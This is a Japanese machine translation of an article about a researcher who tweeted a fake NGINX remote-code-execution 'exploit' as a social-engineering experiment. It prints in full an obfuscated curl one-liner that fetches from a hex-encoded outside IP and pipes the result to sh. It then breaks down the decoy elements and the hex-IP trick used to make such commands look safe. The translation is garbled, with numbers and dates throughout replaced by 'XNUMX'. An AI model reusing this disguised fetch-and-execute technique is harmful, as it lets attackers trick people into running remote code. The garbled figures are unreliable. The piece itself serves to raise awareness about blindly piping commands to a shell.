偽のnginxエクスプロイトによる社会実験が成功

ノート。 翻訳。: 著者 1 月 XNUMX 日に公開されたオリジナルの Note は、情報セキュリティに関心のある人々を対象に実験を実施することにしました。 これを行うために、彼は Web サーバーの未公開の脆弱性を突く偽のエクスプロイトを準備し、それを自身の Twitter に投稿しました。 コード内の明らかな欺瞞を見破る専門家によって即座に暴露されるという彼の仮定は、実現しなかっただけでなく...それらはすべての予想を上回り、さらにはその逆でした。このツイートは、そうではなかった多数の人々から多大な支持を受けました。その内容を確認してください。

TL;DR: いかなる状況でも、sh または bash でファイル パイプラインを使用しないでください。 これはコンピュータの制御を失う素晴らしい方法です。

31 月 XNUMX 日に作成されたコミック PoC エクスプロイトに関する短いストーリーを共有したいと思います。 彼はからの知らせに応じてすぐに現れた アリサ・エサージ・シェフチェンコ、メンバー ゼロデイイニシアチブ (ZDI) によると、RCE (リモート コード実行) につながる NGINX の脆弱性に関する情報が間もなく公開される予定です。 NGINX は多くの Web サイトを支えているため、このニュースは衝撃的だったに違いありません。 しかし、「責任ある開示」プロセスの遅れにより、何が起こったのか詳細は不明でした。これは標準的な ZDI 手順です。

つぶやき NGINX の脆弱性公開について

CURL での新しい難読化技術の開発を終えた後、私は元のツイートを引用し、発見された脆弱性を悪用すると思われる XNUMX 行のコードで構成される「実用的な PoC を漏洩」しました。 もちろん、これは全くのナンセンスでした。 私はすぐに暴露されて、せいぜい数回リツイートされるだけだろうと思っていました（まあ）。

つぶやき 偽のエクスプロイトで

しかし、次に何が起こるかは想像できませんでした。 私のツイートの人気は急上昇しました。 驚くべきことに、現時点（モスクワ時間15月00日1時）では、これが偽物であることに気づいている人はほとんどいない。 多くの人がまったくチェックせずにリツイートします (出力される美しい ASCII グラフィックを賞賛することは言うまでもなく)。

それがどれほど美しいかを見てください！

これらのループや色はすべて素晴らしいものですが、それらを表示するにはマシン上でコードを実行する必要があることは明らかです。 幸いなことに、ブラウザも同じように動作し、法的な問題に巻き込まれたくなかったという事実と相まって、サイトに埋め込まれたコードは、追加のコードをインストールしたり実行したりすることなく、単にエコー呼び出しを行うだけでした。

ちょっとした余談： ネット不気味な, DNZ、私とチームの他のメンバー 暴漢 私たちはしばらくの間、curl コマンドを難読化するさまざまな方法を試してきました。それがクールだからです...そして私たちはオタクだからです。 netspooky と dnz は、私にとって非常に有望と思われるいくつかの新しい方法を発見しました。 私もその楽しみに参加して、トリックの袋に IP XNUMX 進数変換を追加してみました。 IP も XNUMX 進形式に変換できることがわかりました。 さらに、curl やその他のほとんどの NIX ツールは、XNUMX 進数の IP を喜んで使用します。 したがって、説得力があり安全に見えるコマンド ラインを作成するだけでした。 最終的に私はこれに落ち着きました:

curl -gsS https://127.0.0.1-OR-VICTIM-SERVER:443/../../../%00/nginx-handler?/usr/lib/nginx/modules/ngx_stream_module.so:127.0.0.1:80:/bin/sh%00<'protocol:TCP' -O 0x0238f06a#PLToffset |sh; nc /dev/tcp/localhost

社会電子工学 (SEE) - 単なるフィッシングではありません

この実験では、安全性と親しみやすさが重要な部分を占めていました。 それらが彼の成功につながったと思います。 コマンド ラインは、「127.0.0.1」(既知のローカルホスト) を参照することにより、セキュリティを明らかに暗示しています。 Localhost は安全であると考えられており、そのデータがコンピュータから流出することはありません。

精通度は、実験の XNUMX 番目に重要な SEE 要素でした。 対象読者は主にコンピュータ セキュリティの基本に精通している人々で構成されていたため、コードの一部が親しみやすく親しみやすい (したがって安全である) ように見えるようにコードを作成することが重要でした。 古いエクスプロイトの概念の要素を借用し、それらを珍しい方法で組み合わせることで、非常に成功したことが証明されています。

以下はワンライナーの詳細な分析です。 このリストにあるものはすべて着ています 化粧品の性質であり、実際の操作には実質的に何も必要ありません。

本当に必要なコンポーネントは何でしょうか? これ -gsS, -O 0x0238f06a, |sh そしてWebサーバー自体も。 Web サーバーには悪意のある命令は含まれておらず、単にコマンドを使用して ASCII グラフィックスを提供していました。 echo に含まれるスクリプトで index.html。 ユーザーが次の行を入力したとき |sh 途中で、 index.html ロードされて実行されました。 幸いなことに、Web サーバーの管理者には悪意はありませんでした。

• ../../../%00 — ディレクトリを越えることを表します。
• ngx_stream_module.so — ランダムな NGINX モジュールへのパス。
• /bin/sh%00<'protocol:TCP' - おそらく立ち上げ予定です /bin/sh ターゲット マシン上で出力を TCP チャネルにリダイレクトします。
• -O 0x0238f06a#PLToffset - 秘密の成分、サプリメント #PLToffset、PLT に何らかの形で含まれているメモリ オフセットのように見えます。
• |sh; - もう一つの重要な断片。 次の場所にある攻撃用 Web サーバーからのコードを実行するには、出力を sh/bash にリダイレクトする必要がありました。 0x0238f06a (2.56.240.x);
• nc /dev/tcp/localhost - netcat が参照するダミー /dev/tcp/localhostすべてが再び安全に見えるように。 実際、それは何もせず、美しさのラインに含まれています。

これで、一行スクリプトの解読と「社会電子工学」（複雑なフィッシング）の側面についての議論が終わりました。

Webサーバーの設定と対策

私の購読者の大多数は情報セキュリティ/ハッカーであるため、購読者が何かできるように (そして、設定）。 実験はまだ進行中であるため、ここですべての落とし穴を列挙するつもりはありませんが、サーバーが実行する処理がいくつかあります。

• 特定のソーシャル ネットワークでの配布の試みを積極的に監視し、さまざまなプレビュー サムネイルを置き換えて、ユーザーにリンクをクリックするよう促します。
• Chrome/Mozilla/Safari などを、シェル スクリプトを表示する代わりに、Thugcrowd のプロモーション ビデオにリダイレクトします。
• 侵入/露骨なハッキングの明白な兆候を監視し、NSA サーバーへのリクエストのリダイレクトを開始します (ハッ!)。
• ユーザーが通常のブラウザからホストにアクセスするすべてのコンピュータに、トロイの木馬と BIOS ルートキットをインストールします (冗談です!)。

アンチマーのごく一部

この場合、私の唯一の目標は、Apache の機能の一部、特にリクエストをリダイレクトするための優れたルールを習得することでした。そして、次のように考えました。

NGINX エクスプロイト (本物!)

を購読します @alisaesage Twitter で、NGINX の非常に現実的な脆弱性と悪用の機会に対処する ZDI の素晴らしい取り組みをフォローしてください。 彼らの作品は常に私を魅了しており、私の愚かなツイートによって引き起こされたすべての言及や通知に忍耐強く対応してくれたアリスに感謝しています。 幸いなことに、これはいくつかの良い効果ももたらしました。NGINX の脆弱性や、curl の悪用によって引き起こされる問題に対する認識を高めるのに役立ちました。

出所： habr.com